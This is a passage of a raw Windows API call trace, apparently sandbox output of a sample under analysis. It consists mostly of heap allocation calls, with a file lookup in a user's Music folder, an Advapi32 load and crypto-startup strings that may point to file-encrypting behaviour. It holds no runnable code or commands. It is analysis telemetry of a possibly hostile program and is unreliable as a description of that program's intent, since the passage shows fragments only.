lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0246.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0246.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0246.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0246.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509c8 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0246.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0246.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b58 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0246.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0246.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0246.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0246.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0246.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0246.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0246.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0246.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0246.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0246.649] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0246.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0246.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0246.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0246.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0246.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0246.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0246.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0246.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0246.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0246.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0246.651] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0246.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0246.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0246.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0246.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0246.651] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0246.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0246.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0246.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0246.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0246.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.652] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RDmw5DGaT83 YD.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd5fe470, ftCreationTime.dwHighDateTime=0x1d5f0b6, ftLastAccessTime.dwLowDateTime=0x6bc86c70, ftLastAccessTime.dwHighDateTime=0x1d5e5eb, ftLastWriteTime.dwLowDateTime=0x6bc86c70, ftLastWriteTime.dwHighDateTime=0x1d5e5eb, nFileSizeHigh=0x0, nFileSizeLow=0x1565c, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="RDmw5DGaT83 YD.mp3", cAlternateFileName="RDMW5D~1.MP3")) returned 0xa86f90 [0246.652] FindClose (in: hFindFile=0xa86f90 | out: hFindFile=0xa86f90) returned 1 [0246.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0246.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0246.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0246.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0246.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0246.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.653] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0246.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0246.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0246.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0246.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0246.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0246.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0246.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0246.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0246.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0246.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0246.654] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0246.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0246.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0246.654] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c00 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0246.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0246.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0246.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0246.654] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0246.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0246.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0246.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0246.655] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0246.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0246.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0246.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0246.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0246.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.656] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.656] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.656] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0246.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0246.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0246.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0246.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.656] RtlAllocateHeap 